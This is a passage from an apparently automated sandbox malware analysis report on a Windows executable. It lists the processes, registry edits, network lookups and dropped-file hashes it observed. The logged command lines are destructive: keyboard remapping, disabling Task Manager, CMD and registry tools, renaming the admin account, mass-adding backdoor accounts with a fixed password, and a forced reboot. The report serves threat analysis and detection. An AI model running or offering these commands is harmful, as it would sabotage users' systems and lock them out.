| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000071000000000000010000003b0000003c0000003d0000003e0000003f0000004000000041000000420000004300000044000000570000005800000037e000004600000052e0000047e0000049e0000051e000004fe0000053e0000048e000004be0000050e000004de00000520000005300000051000000500000004f0000004b0000004c0000004d0000004e0000004900000048000000470000004500000035e00000370000004a0000002900000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000f0000001000000011000000130000001600000017000000190000001a0000001b0000002b000000280000002700000026000000250000002400000022000000210000003a0000002a0000001d0000005be00000380000002c0000002d0000002e0000002f0000003000000032000000330000003400000035000000360000001de000005de000005ce0000038e000005900000065e0000021e000006be000005ee000005fe000006ae0000069e0000068e0000067e0000032e000006ce000006de0000066e0000020e000002ee000002ce0000030e0000019e0000010e0000024e0000022e0000000 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\WMIC.exe
wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
C:\Windows\system32\net.exe
net user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net.exe
net user T3yZrQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
C:\Windows\system32\net.exe
net user 8rJpX1 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
C:\Windows\system32\net.exe
net user 9MaL2Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
C:\Windows\system32\net.exe
net user K4$dF27 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
C:\Windows\system32\net.exe
net user xC78RT Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user xC78RT Maxcheto /add
C:\Windows\system32\net.exe
net user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net.exe
net user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net.exe
net user R2xD1B Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user R2xD1B Maxcheto /add
C:\Windows\system32\net.exe
net user m14T8z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user m14T8z Maxcheto /add
C:\Windows\system32\net.exe
net user L27w8G Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user L27w8G Maxcheto /add
C:\Windows\system32\net.exe
net user P9dR2Y Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
C:\Windows\system32\net.exe
net user 5QL71t Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5QL71t Maxcheto /add
C:\Windows\system32\net.exe
net user r8B6V3F Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
C:\Windows\system32\net.exe
net user 7CXz1b Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
C:\Windows\system32\net.exe
net user n38vJQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user n38vJQ Maxcheto /add
C:\Windows\system32\net.exe
net user x6G7P1L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
C:\Windows\system32\net.exe
net user M239Wk Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user M239Wk Maxcheto /add
C:\Windows\system32\net.exe
net user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net.exe
net user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net.exe
net user t93V6D Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user t93V6D Maxcheto /add
C:\Windows\system32\net.exe
net user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net.exe
net user x9K1P7L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
C:\Windows\system32\net.exe
net user z7R4M3 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
C:\Windows\system32\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs
| MD5 | 7c652236d1e09a76cfc27cb2611b80ad |
| SHA1 | f9c359054835b06308165e110cdc5229d4fda8fb |
| SHA256 | 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c |
| SHA512 | 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe |
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd
| MD5 | 7835d8ae389b8b78ea4d06c024d63849 |
| SHA1 | 5a0196e67a8af7185b372aacf5ad817a26546ad1 |
| SHA256 | 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1 |
| SHA512 | 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png
| MD5 | 4947724257526b4226e21ae7541822cd |
| SHA1 | af4db735de48a5069e70758bdfdf41a8214aa346 |
| SHA256 | 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba |
| SHA512 | 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png
| MD5 | 2f368b76ab153329fb42db70493474b1 |
| SHA1 | 4c4752399ee2678f6cf4d67affca9dcba59d0023 |
| SHA256 | ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f |
| SHA512 | adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png
| MD5 | 9ef9685c5a578bfdceccaedb0d5fa519 |
| SHA1 | 713f8621414772eee6602f9fa9ee0a3528d62057 |
| SHA256 | 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746 |
| SHA512 | 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png
| MD5 | f346c440007285aff13e1e0512608862 |
| SHA1 | 4b4a44bc30d37c66dea948bd406effc2bcc63775 |
| SHA256 | 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901 |
| SHA512 | 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png
| MD5 | 1db691b8c60c5f82f3dae2df999c1c7c |
| SHA1 | c252d4a6e065ab5b122f0ae43f6abdbaad49d80e |
| SHA256 | f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d |
| SHA512 | 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png
| MD5 | 908587d867cd053293e2106d70cf42f3 |
| SHA1 | 83ffc3fc7f61d972b41347ff783a29b41bf13087 |
| SHA256 | f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444 |
| SHA512 | 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp
| MD5 | 40e2162dfc51fded60ea7b1de3acf588 |
| SHA1 | 3c0b932a845027db10e67c47c0c9cd45fa80ecbb |
| SHA256 | d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7 |
| SHA512 | 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt
| MD5 | e3a317c88b65b975be8e1c21e149f16d |
| SHA1 | 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019 |
| SHA256 | b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0 |
| SHA512 | 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044 |